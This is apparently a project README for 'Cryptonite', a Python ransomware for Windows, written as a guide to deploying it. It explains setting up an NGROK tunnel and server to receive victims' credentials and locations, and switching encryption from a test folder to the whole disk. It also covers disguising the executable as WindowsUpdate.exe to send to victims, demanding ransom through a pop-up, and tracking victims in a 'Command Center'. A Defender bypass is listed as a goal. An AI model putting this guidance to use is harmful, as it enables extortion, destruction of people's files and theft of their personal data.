Cryptonite A Ransomware for Windows OS
Cryptonite A Ransomware for Windows OS

Cryptonite: A Ransomware for Windows OS

Cryptonite was developed with a motive of achieving maximum output with minimum efforts. Anyone can learn to use Cryptonite. I have included two versions of Cryptonite. One that stores data using Sqlite3 and the other that uses Mongo DB Atlas to push the results into the cloud. Default method is to use Sqlite3, but if you are interested in using the Mongo DB version of Cryptonite then switch to the mongo branch of this repository.

The below steps will guide you to use Cryptonite in detail (subjected to change as I add new concepts


  •  Encrypt all files except system specific ones
  •  Encrytion must only be decrypted with a special key
  •  Send the credentials of the victim to the attacker via secure tunnel, preferably NGROK
  •  Pop up box should appear after encryption asking for ransom
  •  Create a server to retrieve information sent by the victim
  •  Add custom extension to encrypted files
  •  Create an exe file generator
  •  Graphical User Interface (Victim side)
  •  Graphical User Interface (Attacker side)
  •  Create Windows Defender bypass script

Demo Video

Setting Up For The First Time

The following setups need to be done if you are using Cryptonite for the first time.

Create an NGROK account

  • Visit NGROK
  • Signup for an account. If you can spare some money, then buy the premium version. Else, the free version will suffice.
  • Login to NGROK
  • Download the suitable release of NGROK for your operating system.
Download Ngrok for OS
Download Ngrok for OS
  • Unzip and install NGROK.
    • For Linux / MAC users, unzip the folder via terminal: unzip /path/to/
    • For Windows users, just unzip the folder
    • Make sure to add ngrok to PATH
  • Authenticate your NGROK:-
    • Copy your AUTH TOKEN from NGROK SETUP PAGE
    • For windows users, open cmd and type (replace YOUR_AUTH_TOKEN_HERE with your authtoken):
ngrok authtoken YOUR_AUTH_TOKEN_HERE
    • For Linux / MAC users, open terminal and type (replace YOUR_AUTH_TOKEN_HERE with your authtoken):-
ngrok authtoken YOUR_AUTH_TOKEN_HERE

Install the Python requirements for Cryptonite:

pip install -r "requirements.txt"  

Firing Up The Server

Run the file before you send the ransomware to victims. The starts the server to receive victim’s data sent by Cryptonite and creates an NGROK tunnel that performs port forwarding so that our server can be accessed by anyone around the world. Running also creates a DB file to store the victims’ info.

❗ Make sure that runs all the time.

Copy the NGROK URL generated in the terminal. It will be useful in the next step.

Filling Up The Details

  • Run and fill up the necessary details.
  • By default, Cryptonite is going to encrypt the contents of the folder named testfolder found in the directory where is run. But if you want to specify some different path, say the entire system, then make sure to edit this line by replacing ./testfolder to / before executing Dpn’t forget to save
  • Running will create an exe file that can be shipped to the victim.
        for root, dir, file in os.walk('./testfolder'):

Test It On Your Computer

Believe me when I say this… You can safely test this Ransomware on your device provided you mention the correct path to the folder you are testing on. I have already created a testing folder and the path has also been given. So its easier for you to see for yourself. What you need to do is run, execute and see the magic happen. If you wish to create your own folder and test it there, then mention the absolute path of the folder in place of ./testfolder

Do not give the base folder (/) for testing purposes

Never give the base folder for testing pupose as it will initiate the encryption of all the files (except the files inside these folders). Please refrain from using the base folder unless you are absolutely sure of what you are doing. To be on the safer side, I have already ceated a testfolder and set the default value of the Encryption Folder Path to testfolder. Therefore, even if you accidentally run this Ransomware, it will only encrypt the testfolder and not the entire system.

Send It To Your Victims

After we have tested our Ransomware, we intend to send it to the victims in the form of an exe file. I have created a python script that will generate an exe file of custom name. By default the name would be WindowsUpdate.exe. But you can change it anytime you want using

Remember, creating an exe will take quite a long time (upto five minutes!), hence chill and wait out the process and do not close during exe file generation. exeGen will automatically close itself after the exe file has been generated.

Things to consider before sending the exe file

  • Make sure that the Encryption Folder Path is changed from ./testfolder to / (if you are going for system wide encryption) or any folder path of your choice.
  • All the Details should be correctly filled.
  • NGROK and the must run all the time. Failure of which can result in Ransomware not being able to encrypt files (a popup of network error will be shown on the victim’s screen and the Ransomware terminates).

Cryptonite Command Center

An all in one monitoring dashboard created to understand the level of destruction caused by this ransomware. The attacker can get to know the location of his victims plotted on a map with high precision. His IP address, hostname, place and other information are stored in a database and presented to the attacker in a neat table. Search and delete functionality has also been added. Grab a cup of coffee and sip on it while Cryptonite does all the hard work.

Points to note…

  • The Cryptonite Command Center can be accessed by running the file.
  • Always use the inbuilt RELOAD button to reload the Command Center in case the values don’t match up.
Dark Mode

Cryptonite (this link opens in a new window) by CYBERDEVILZ (this link opens in a new window)

Fully functional ransomware developed solely using Python that uses minimum resources to give maximum output.